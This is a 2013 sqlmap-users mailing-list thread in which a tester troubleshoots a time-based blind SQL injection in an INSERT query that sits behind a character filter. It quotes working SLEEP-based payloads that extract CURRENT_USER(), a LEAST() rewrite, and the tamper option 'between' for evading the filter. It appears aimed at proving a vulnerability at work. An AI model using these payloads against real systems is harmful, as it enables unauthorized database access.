Ah, I didn't try that one before.
That did the trick, thanks! :-)
On 2013-06-03 09:35, Dennis wrote:
> Haven't tried, but if it's just for the '>' character, you might wanna
> try '--tamper=between'. That should get rid of the '>' character in
> the
> payloads.
>
> Cheers
> Dennis
>
>
> Am 01.06.2013 22:39, schrieb d...@alcor.se:
>> Just to add a bit to this, I tried something else that I got to work.
>> I changed the sqlmap payload by using LEAST(), which became this:
>>
>> ',(SELECT/**/1/**/AND/**/9457=IF((LEAST(ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1)),16)=16),SLEEP(5),9457)/**/)),('
>>
>> Is this something sqlmap can currently do?
>> Or maybe there's a better solution for it?
>> Or should I implement it? (never looked at the sqlmap code, but might
>> be fun to start digging into).
>>
>> Cheers for now!
>>
>>
>> On 2013-06-01 21:57, d...@alcor.se wrote:
>>> Hey guys, I have a server at work where there's an SQLi in an
>>> INSERT,
>>> but I can't prove that it's actually a threat so far due to a little
>>> "filter" that replaces some input characters.
>>> I crafted a little injection that injects a sleep into the insert,
>>> and
>>> makes it sleep for 10 seconds, and then doesn't insert anything (due
>>> to
>>> a duplicate error that I made sure to get).
>>>
>>> The original query looks like this:
>>>
>>> insert into discount_phone_registry (phone_nbr,reg_date) values
>>> ('111',date(now()));.
>>> And the injection is in the phone_nbr, so I made the following
>>> injection: 111',(SLEEP(10))),('111
>>> And it then becomes: insert into discount_phone_registry
>>> (phone_nbr,reg_date) values ('111',(SLEEP(10))),('111',date(now()))
>>> So, so far so good, right?
>>>
>>> Well when I wanted to use sqlmap, I noticed that our filter is doing
>>> some stupid things ^^
>>> This is the payload from sqlmap
>>>
>>> 111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))>16),SLEEP(5),9457)/**/)),('
>>>
>>> But as it gets submitted in the form, it becomes
>>>
>>> 111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))_16),SLEEP(5),9457)/**/)),('
>>>
>>> Notice how the > became a _
>>> The tampering scripts I'm using are space2comment and charencode,
>>> and
>>> charencode actually seems to trick it, since I'm getting the
>>> less/grater
>>> char in the error output from the web server now.
>>> If I copy/paste the payload directly from the web server error
>>> output,
>>> directly into the MySQL client and run it, it works.
>>>
>>> Is there anything else I can try to get this to work?
>>>
>>> PS: If it helps I just noticed this!
>>>
>>> 1064 - You have an error in your SQL syntax; check the manual that
>>> corresponds to your MySQL server version for the right syntax to use
>>> near ';16),SLEEP(5),9457)/**/)),('',date(now()))' at line 1
>>> insert into discount_phone_registry (phone_nbr,reg_date) values
>>> ('111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))<16),SLEEP(5),9457)/**/)),('',date(now()))
>>>
>>> Notice how it complains on ";16" which is probably the encoded >
>>> sign
>>> (>).
>>>
>>> Thanks in advance! :-)
>>>
>>>
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Get 100% visibility into Java/.NET code with AppDynamics Lite
>>> It's a free troubleshooting tool designed for production
>>> Get down to code-level detail for bottlenecks, with <2% overhead.
>>> Download for free and get started troubleshooting in minutes.
>>> http://p.sf.net/sfu/appdyn_d2d_ap2
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sqlmap-users@lists.sourceforge.net
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> ------------------------------------------------------------------------------
>> Get 100% visibility into Java/.NET code with AppDynamics Lite
>> It's a free troubleshooting tool designed for production
>> Get down to code-level detail for bottlenecks, with <2% overhead.
>> Download for free and get started troubleshooting in minutes.
>> http://p.sf.net/sfu/appdyn_d2d_ap2
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
------------------------------------------------------------------------------
How ServiceNow helps IT people transform IT departments:
1. A cloud service to automate IT design, transition and operations
2. Dashboards that offer high-level views of enterprise services
3. A single system of record for all IT processes
http://p.sf.net/sfu/servicenow-d2d-j
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
